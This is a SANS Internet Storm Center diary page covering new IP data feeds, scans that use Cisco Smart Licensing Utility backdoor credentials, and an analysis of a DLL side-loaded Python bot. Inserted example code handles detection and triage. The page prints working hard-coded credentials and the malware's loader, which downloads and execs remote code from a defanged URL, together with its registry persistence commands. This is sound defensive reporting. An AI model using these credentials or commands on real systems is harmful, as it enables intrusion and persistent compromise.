Diaries
=======
Published: 2025-03-20 by Johannes Ullrich
[Some new Data Feeds, and a little "incident".](/forums/diary/Some%20new%20Data%20Feeds%2C%20and%20a%20little%20%22incident%22./31786/)
---------------------------------------------------------------------------------------------------------------------------------------
Our API (https://isc.sans.edu/api) continues to be quite popular. One query we see a lot is lookups for individual IP addresses. Running many queries as you go through a log may cause you to get locked out by our rate limit. To help with that, we now offer additional "summary feeds" that include all data recently received. You may download these feeds and import them in your database of choice (or grep the text file for records). This will make bulk lookups a lot easier and faster.
For more details and continuing updates, see, [https://isc.sans.edu/feeds\_doc.html](https://isc.sans.edu/feeds_doc.html)
I will gladly add more feeds as needed. Please let me know via our [contact page](/contact.html) if you run into errors.
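As an added example (not ISC's own tooling), this is what the "download the feed and grep it locally" workflow looks like when scripted: one download, one in-memory index, and then every IP seen in a log is resolved without touching the API rate limit. The column layout of the feed is an assumption made for illustration; check feeds_doc.html for the real format and adjust `FEED_COLUMNS`. The feed rows and log lines below are constructed sample data.

```python
"""Bulk IP enrichment against a locally downloaded ISC summary feed.

Added example, not ISC code. The feed is assumed to be a tab-separated
text file with one record per IP (columns: ip, reports, targets,
first_seen, last_seen); adjust FEED_COLUMNS to the documented layout.
Sample feed rows and log lines are constructed, not real records.
"""
import ipaddress
import re
from typing import Dict, List

FEED_COLUMNS = ("ip", "reports", "targets", "first_seen", "last_seen")  # assumed layout

# Constructed sample of a downloaded summary feed.
SAMPLE_FEED = """\
# ip\treports\ttargets\tfirst_seen\tlast_seen
192.0.2.10\t1234\t56\t2025-03-01\t2025-03-20
198.51.100.7\t8\t3\t2025-03-19\t2025-03-20
"""

# Constructed sample web-server log lines (client IP is the first token).
SAMPLE_LOG = """\
192.0.2.10 - - [20/Mar/2025:10:00:01 +0000] "GET /cslu/v1/scheduler/jobs HTTP/1.1" 404 0
203.0.113.5 - - [20/Mar/2025:10:00:02 +0000] "GET / HTTP/1.1" 200 512
198.51.100.7 - - [20/Mar/2025:10:00:03 +0000] "GET /web.config.zip HTTP/1.1" 404 0
"""

IP_RE = re.compile(r"^(\S+)")


def load_feed(text: str) -> Dict[str, dict]:
    """Parse the feed into {ip: record}; comments and malformed rows are skipped."""
    index: Dict[str, dict] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) != len(FEED_COLUMNS):
            continue
        rec = dict(zip(FEED_COLUMNS, fields))
        try:
            ip = str(ipaddress.ip_address(rec["ip"]))  # normalise, reject junk
        except ValueError:
            continue
        rec["ip"] = ip
        rec["reports"] = int(rec["reports"])
        rec["targets"] = int(rec["targets"])
        index[ip] = rec
    return index


def enrich_log(log_text: str, index: Dict[str, dict]) -> List[dict]:
    """One dict per log line with the matching feed record (or None).

    No network calls: each lookup is a dictionary hit, so a multi-million
    line log never touches the API rate limit."""
    out = []
    for line in log_text.splitlines():
        m = IP_RE.match(line)
        if not m:
            continue
        try:
            ip = str(ipaddress.ip_address(m.group(1)))
        except ValueError:
            continue
        out.append({"ip": ip, "line": line, "feed": index.get(ip)})
    return out


def flagged_ips(log_text: str, feed_text: str) -> List[str]:
    """IPs from the log that appear in the feed, most-reported first."""
    index = load_feed(feed_text)
    hits = [e for e in enrich_log(log_text, index) if e["feed"]]
    hits.sort(key=lambda e: e["feed"]["reports"], reverse=True)
    return [e["ip"] for e in hits]


if __name__ == "__main__":
    for ip in flagged_ips(SAMPLE_LOG, SAMPLE_FEED):
        print(ip)
```

Swap `SAMPLE_FEED` for the contents of the downloaded file and `SAMPLE_LOG` for your log; for very large feeds, load the index into SQLite instead of a dict, but the lookup pattern stays the same.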
We do often get requests for commercial use of our data. Our data is published under a "[Creative Commons](https://creativecommons.org/licenses/by-nc-sa/4.0/) Attribution-NonCommercial-ShareAlike 4.0 International" license. You may use the data if you attribute it to us and do not resell it. We are okay with you using the data in a SOC at a commercial enterprise to help you defend your organization.
If you find it helpful, let us know. Tell us what works and what does not. The simplest way to help us out is to run one of our honeypots and report what works or doesn't work with it. Please do not ask us to remove data because you consider it a false positive. False positives are part of the game, and while we will gladly add comments to some of the data, we do not remove records, as doing so would distort the data for other research tasks.
But enough about data feeds. Today, we also had a recurrence of an attack I hadn't seen in a while. This "incident" started with some of our handlers receiving a request to update a link in an older podcast:
The e-mail looked reasonable at first, and we do not mind corrections. URLs change. But in this case, it turned out to be a fake request. The email did not originate from EFF. Granted, organizations sometimes use marketing firms, and those may not be competent enough to send from the customer's e-mail domain. But this was certainly a fake update request. The original URL still works; it just redirects to another page at EFF.org. The "academized.com" page, as far as I can tell, is not related to EFF at all. Its content matches the EFF page, but it belongs to an "Essay Writing Service", a type of business that we, as part of a reputable academic institution, do not want to link to. These businesses are hurting these days because AI tools do the job better and cheaper. In the past, paper writing services have also often used comment spam to advertise.
\---
Johannes B. Ullrich, Ph.D. , Dean of Research, [SANS.edu](https://sans.edu)
[Twitter](https://jbu.me/164)|
Published: 2025-03-19 by Johannes Ullrich
[Exploit Attempts for Cisco Smart Licensing Utility CVE-2024-20439 and CVE-2024-20440](/forums/diary/Exploit%20Attempts%20for%20Cisco%20Smart%20Licensing%20Utility%20CVE-2024-20439%20and%20CVE-2024-20440/31782/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
In September, Cisco published an advisory noting two vulnerabilities \[1\]:
* CVE-2024-20439: Cisco Smart Licensing Utility Static Credential Vulnerability
* CVE-2024-20440: Cisco Smart Licensing Utility Information Disclosure Vulnerability
These two vulnerabilities are somewhat connected. The first one is one of the many backdoors Cisco likes to equip its products with. A simple fixed password that can be used to obtain access. The second one is a log file that logs more than it should. Using the first vulnerability, an attacker may access the log file. A quick search didn’t show any active exploitation, but details, including the backdoor credentials, were published in a blog by Nicholas Starke shortly after Cisco released its advisory \[2\]. So it is no surprise that we are seeing some exploit activity:
The API affected by this vulnerability can be found at /cslu/v1. One of the sample requests:
> `GET /cslu/v1/scheduler/jobs HTTP/1.1`
> `Host: [redacted]:80`
> `Authorization: Basic Y3NsdS13aW5kb3dzLWNsaWVudDpMaWJyYXJ5NEMkTFU=`
> `Connection: close`
The base64 encoded string decodes to `cslu-windows-client:Library4C$LU`, the credentials Nicholas's blog identified.
The same group looking for this URL is also attempting several other attacks. Most are just looking for configuration files like "/web.config.zip", and interestingly, they also chose to scan for what looks like CVE-2024-0305 (but I am not sure about that; I base this on the exploit found on GitHub \[3\]). Other vulnerability notes suggest a different URL for this vulnerability. Either way, it is likely a vulnerability in a DVR.
> `GET /classes/common/busiFacade.php HTTP/1.1`
> `Host: [redacted]:80`
> `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36`
> `Authorization: Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0RjgwMjVFNw==`
> `Content-Type: application/x-www-form-urlencoded`
> `Connection: close`
In this case, the credentials decode to `helpdeskIntegrationUser:dev-C4F8025E7` (note the trailing "7", which is easy to drop when transcribing the decoded string).
It's always fun to see how cheap IoT devices and expensive enterprise security software share similar basic vulnerabilities.
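Both requests above are the same detection problem: a hard-coded credential travelling in a `Basic` header is a fixed string once decoded, so it can be matched exactly rather than inferred from the URL. The following is an added example, not ISC code; the two credential pairs are the ones decoded on this page, the request samples are constructed from the quoted excerpts (host still redacted), and the "watched path" list is an assumption for illustration. A malformed header (bad padding, non-UTF-8 bytes) is reported rather than allowed to crash the scan, since scanners do send such junk.

```python
"""Flag HTTP requests that present known hard-coded credentials.

Added example, not from the diary. Known pairs are the two decoded on
this page; the requests are constructed from the quoted log excerpts.
"""
import base64
import binascii
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Credential pairs decoded on this page.
KNOWN_STATIC_CREDS = {
    ("cslu-windows-client", "Library4C$LU"):
        "CVE-2024-20439 Cisco Smart Licensing Utility static credential",
    ("helpdeskIntegrationUser", "dev-C4F8025E7"):
        "DVR busiFacade.php hard-coded credential (possibly CVE-2024-0305, per the diary)",
}
# Assumed: paths where any Basic auth attempt is worth a look, even with unknown credentials.
WATCHED_PATHS = ("/cslu/v1/", "/classes/common/busiFacade.php")


@dataclass
class Finding:
    method: str
    path: str
    user: Optional[str]
    reason: str


def parse_request(raw: str) -> Tuple[str, str, dict]:
    """Split a raw HTTP/1.x request head into (method, path, headers); header names lower-cased."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def decode_basic(value: str) -> Optional[Tuple[str, str]]:
    """Return (user, password) from 'Basic <b64>', or None if it cannot be decoded."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True)  # strict: reject junk
        user, sep, pw = raw.decode("utf-8").partition(":")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return (user, pw) if sep else None


def inspect(raw_request: str) -> Optional[Finding]:
    """Classify one request; None means nothing of interest."""
    method, path, headers = parse_request(raw_request)
    auth = headers.get("authorization")
    watched = path.startswith(WATCHED_PATHS)
    if auth is None:
        return Finding(method, path, None, "watched path, no auth") if watched else None
    creds = decode_basic(auth)
    if creds is None:
        return Finding(method, path, None, "undecodable Basic credential")
    if creds in KNOWN_STATIC_CREDS:
        return Finding(method, path, creds[0], KNOWN_STATIC_CREDS[creds])
    if watched:
        return Finding(method, path, creds[0], "Basic auth against watched path")
    return None


def scan(requests: List[str]) -> List[Finding]:
    return [f for f in (inspect(r) for r in requests) if f is not None]


# Constructed from the two requests quoted above; the third carries a deliberately broken header.
SAMPLES = [
    "GET /cslu/v1/scheduler/jobs HTTP/1.1\r\nHost: [redacted]:80\r\n"
    "Authorization: Basic Y3NsdS13aW5kb3dzLWNsaWVudDpMaWJyYXJ5NEMkTFU=\r\nConnection: close\r\n",
    "GET /classes/common/busiFacade.php HTTP/1.1\r\nHost: [redacted]:80\r\n"
    "Authorization: Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0RjgwMjVFNw==\r\nConnection: close\r\n",
    "GET /cslu/v1/scheduler/jobs HTTP/1.1\r\nHost: [redacted]:80\r\nAuthorization: Basic !!notbase64\r\n",
    "GET /index.html HTTP/1.1\r\nHost: [redacted]:80\r\n",
]

if __name__ == "__main__":
    for f in scan(SAMPLES):
        print(f"{f.method} {f.path} user={f.user!r}: {f.reason}")
```

The exact match on the decoded pair is the robust part: it survives a scanner changing the path or User-Agent, and it does not fire on legitimate users of the same endpoint who present their own credentials. Feed it request heads from a proxy or honeypot capture rather than a combined access log, since the latter does not record the Authorization header.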
\[1\] https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw
\[2\] https://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html
\[3\] https://github.com/jidle123/cve-2024-0305exp/blob/main/cve-2024-0305.py
\---
Johannes B. Ullrich, Ph.D. , Dean of Research, [SANS.edu](https://sans.edu)
[Twitter](https://jbu.me/164)|
Published: 2025-03-18 by Xavier Mertens
[Python Bot Delivered Through DLL Side-Loading](/forums/diary/Python%20Bot%20Delivered%20Through%20DLL%20Side-Loading/31778/)
-----------------------------------------------------------------------------------------------------------------------------
One of my hunting rules triggered on some suspicious Python code, and, diving deeper, I found an interesting example of DLL side-loading. This technique involves placing a malicious DLL with the same name and export structure as a legitimate DLL in a location the application checks first (typically its own directory), causing the application to load the malicious DLL instead of the intended one. This is a classic weakness seen for years in many software products. The attacker also implemented simple tricks to bypass common security controls.
The malware is delivered through a ZIP archive: “Hootsuite (1).zip”\[[1](https://www.virustotal.com/gui/file/dee0f033d6f965dd9eebc3bb0c326f85881ef8674cea5f05f4ccc3e7de4264c3/detection)\]. The archive contains several files with the Hidden attribute set:
Once opened by the victim, the only file displayed is Hootsuite.exe, with a PDF icon. The file itself is not malicious and has been known on VT since 2017!\[[2](https://www.virustotal.com/gui/file/08c7fb6067acc8ac207d28ab616c9ea5bc0d394956455d6a3eecb73f8010f7a2/detection)\] It is a copy of the old Haihaisoft PDF reader\[[3](https://www.haihaisoft.com/PDF_Reader_download.aspx)\], which has a DLL side-loading vulnerability. When executed from a normal (empty) directory, you get the reader:
When executed from the directory extracted from the ZIP archive, a hidden msimg32.dll sits next to it. This DLL is malicious\[[4](https://www.virustotal.com/gui/file/993a043186315aa23b685c319eaff841875653971917a75baa3656fb4bb4258c/detection)\]. Compared to the official version, this one is very large (103MB), probably to avoid being scanned by many security tools, which skip big files for performance reasons. This DLL will be loaded instead of the Microsoft one:
Once executed, the behavior of the PDF reader will be completely different:
This is confirmed while debugging the process:
The .bat script will perform some interesting tasks. First, it will unpack and install a simple Python environment:
mkdir C:\\Users\\Public\\R8D4YmtQLNucXFlnq3
Rar x -pC2PINduHvfu86NQXni -inul -y QkCIiJe4GE3FJLfTqe.rar C:\\Users\\Public\\R8D4YmtQLNucXFlnq3
Then, it will fetch the Python bot:
set "CODE\_LOADER=import requests,base64; exec(base64.b64decode(requests.get('hxxps://bitbucket\[.\]org/lonenone111/long/raw/7600761c03bce0b01ec944de76bc155b81158ce7/Final\_Bot').text))"
start "" /min "C:\\Users\\Public\\R8D4YmtQLNucXFlnq3\\synaptics.exe" -c "%CODE\_LOADER%"
To bypass simple rules that look for suspicious process names, “python.exe” has been renamed to “synaptics.exe”.
Finally, persistence is implemented:
echo start "" /min "C:\\Users\\Public\\R8D4YmtQLNucXFlnq3\\synaptics.exe" -c "%CODE\_LOADER%" >> "C:\\Users\\Public\\Windows Security"
echo //4mY2xzDQo= > "C:\\Users\\Public\\Windows Security.~b64"
certutil -f -decode "C:\\Users\\Public\\Windows Security.~b64" "C:\\Users\\Public\\Windows Security.bat"
copy /b "C:\\Users\\Public\\Windows Security.bat" /b + "C:\\Users\\Public\\Windows Security" /b "C:\\Users\\Public\\Windows Security.bat"
reg add "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /v "Windows Security" /t REG\_SZ /d "C:\\Windows\\Explorer.EXE C:\\Users\\Public\\Windows Security.bat" /f
Note how the attacker prepends a BOM (Byte Order Mark) to the batch file by way of the small Base64 string:
remnux@remnux:/MalwareZoo/20250317/hootsuite/images$ base64dump.py .bat -s 14 -d | xxd
00000000: fffe 2663 6c73 0d0a ..&cls..
Finally, a decoy PDF file (not malicious) present in the archive is opened using the default system viewer.
Unfortunately, the “Final\_Bot” file is no longer available...
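To see what the `certutil` / `copy /b` dance above actually produces, and why the two leading bytes matter, here is an added example (not the attacker's script and not ISC tooling) that rebuilds the persistence file in a temporary directory the same way the batch does and then triages it. The usual reading of the trick: cmd.exe executes the file byte by byte, so `ÿþ&cls` is just an unknown command chained to `cls`, which wipes the resulting error off the screen, while analysis tools that honour the BOM decode the rest of the file as UTF-16 and see garbage. The loader command line is copied from the diary with the Bitbucket URL left defanged; nothing is fetched or executed.

```python
"""Rebuild the BOM-prefixed persistence .bat like the dropper does, then triage it.

Added example, not the attacker's code. The three steps mirror the batch:
echo >> "Windows Security", certutil -decode, copy /b stub + body. Files go
to a temporary directory instead of C:\\Users\\Public.
"""
import base64
import os
import re
import tempfile

BOM_STUB_B64 = "//4mY2xzDQo="  # the string the script hands to certutil

# The 'start' line the script appends; URL defanged exactly as in the diary.
LOADER_LINE = (
    'start "" /min "C:\\Users\\Public\\R8D4YmtQLNucXFlnq3\\synaptics.exe" -c '
    '"import requests,base64; exec(base64.b64decode(requests.get('
    "'hxxps://bitbucket[.]org/lonenone111/long/raw/7600761c03bce0b01ec944de76bc155b81158ce7/Final_Bot').text))\""
)


def build_persistence_bat(directory: str) -> str:
    """Emulate the three batch steps and return the path of the finished .bat."""
    body = os.path.join(directory, "Windows Security")
    stub = os.path.join(directory, "Windows Security.~b64")
    bat = os.path.join(directory, "Windows Security.bat")
    with open(body, "wb") as f:                      # echo start ... >> "Windows Security"
        f.write(LOADER_LINE.encode("ascii") + b"\r\n")
    with open(stub, "w") as f:                       # echo //4mY2xzDQo= > "...~b64"
        f.write(BOM_STUB_B64 + "\n")
    with open(stub) as f, open(bat, "wb") as out:    # certutil -f -decode
        out.write(base64.b64decode(f.read().strip()))
    with open(bat, "ab") as out, open(body, "rb") as b:  # copy /b .bat + body .bat
        out.write(b.read())
    return bat


def triage_batch(path: str) -> dict:
    """Read a batch file, note and strip a UTF-16 BOM, pull out the interesting bits.

    Decoding as latin-1 after dropping the two bytes reproduces what cmd.exe
    sees, instead of the UTF-16 garbage a BOM-honouring tool would produce."""
    with open(path, "rb") as f:
        data = f.read()
    has_bom = data.startswith(b"\xff\xfe")
    text = (data[2:] if has_bom else data).decode("latin-1")
    lines = [ln.rstrip("\r") for ln in text.split("\n") if ln.strip()]
    urls = re.findall(r"hxxps?://\S+?(?=['\"\)])", text)
    exes = re.findall(r'"([^"]+\.exe)"', text)
    return {
        "utf16_bom": has_bom,
        "first_line": lines[0] if lines else "",
        "launched_exes": exes,
        "defanged_urls": urls,
        "python_oneliner": "exec(base64.b64decode(" in text,
    }


def demo() -> dict:
    """Build the file in a scratch directory and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        return triage_batch(build_persistence_bat(tmp))


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The two checks worth keeping in a triage script are the ones this block reports: a `.bat` whose first two bytes are `FF FE`, and a quoted `.exe` path under `C:\Users\Public` that is started with `-c "import ..."`, since a renamed interpreter still takes interpreter arguments.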
\[1\] [https://www.virustotal.com/gui/file/dee0f033d6f965dd9eebc3bb0c326f85881ef8674cea5f05f4ccc3e7de4264c3/detection](https://www.virustotal.com/gui/file/dee0f033d6f965dd9eebc3bb0c326f85881ef8674cea5f05f4ccc3e7de4264c3/detection)
\[2\] [https://www.virustotal.com/gui/file/08c7fb6067acc8ac207d28ab616c9ea5bc0d394956455d6a3eecb73f8010f7a2/detection](https://www.virustotal.com/gui/file/08c7fb6067acc8ac207d28ab616c9ea5bc0d394956455d6a3eecb73f8010f7a2/detection)
\[3\] [https://www.haihaisoft.com/PDF\_Reader\_download.aspx](https://www.haihaisoft.com/PDF_Reader_download.aspx)
\[4\] [https://www.virustotal.com/gui/file/993a043186315aa23b685c319eaff841875653971917a75baa3656fb4bb4258c/detection](https://www.virustotal.com/gui/file/993a043186315aa23b685c319eaff841875653971917a75baa3656fb4bb4258c/detection)
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
[PGP Key](https://keybase.io/xme/key.asc)
Podcasts
========
A daily summary of cyber security news from the SANS Internet Stormcenter.
* [SANS Stormcast Friday Mar 21st: New Data Feeds; SEO Spam; Veeam Deserialization; IBM AIX RCE;](/podcastdetail/9374) (released 2025-03-21)
* [SANS Stormcast Thursday Mar 20th: Cisco Smart Licensing Attacks; Vulnerable Drivers again; Synology Advisories Updated](/podcastdetail/9372) (released 2025-03-20)
* [SANS Stormcast Wednesday Mar 19th 2025: Python DLL Side Loading; Tomcast RCE Correction; SAML Roulette; Windows Shortcut 0-Day](/podcastdetail/9370) (released 2025-03-19)
* [SANS Stormcast Tuesday Mar 18th 2025: Analyzing GUID Encoded Shellcode; Node.js SAML Vuln; Tomcat RCE in the Wild; CSS e-mail obfuscation](/podcastdetail/9368) (released 2025-03-18)
* [SANS Stormcast Monday March 17th: Mirai Makes Mistakes; Compromised Github Action; ruby-saml vulnerability; Fake GitHub Security Alert Phishing](/podcastdetail/9366) (released 2025-03-17)
* [SANS Stormcast: File Hashes in MSFT BI; Apache Camel Vuln; Juniper Fixes Exploited Vuln; AMI Patches 10.0 Redfish BMC Vuln](/podcastdetail/9364) (released 2025-03-14)
* [SANS Stormcast Thursday Mar 13th: Exploiting Login Pages with Log4j; Patch Tuesday Fallout; Adobe Patches; Medusa Ransomware; Zoom and Font Library Updates;](/podcastdetail/9362) (released 2025-03-13)
Jobs
====
* **Experian** (UK-Remote): Cyber Incident Response Lead. Certifications: GCIH, GCFE, GCFA, GCFR
* **Experian** (US-Remote): Cyber Incident Response Lead - Advanced Response Team. Certifications: GCIH, GCFE, GCFA, GCFR
* **Experian** (US-Remote): Senior Manager, Global Incident Response. Certifications: GCIH, GCFE, GCFA, GCFR
* **UKG** (Weston, FL; Alpharetta, GA; Atlanta, GA; Lowell, MA; Seattle, WA; San Francisco, CA): Principal Product Security Engineer. Certifications: GSE, GXPN, GREM
* **Partner Forces** (Arlington, VA): Senior Cybersecurity SME. Certifications: GIAC Response and Industrial Defense (GRID), GIAC Industrial Cyber Security Professional (GICSP)
© 2025 SANS Internet Storm Center. Content licensed under [Creative Commons BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/).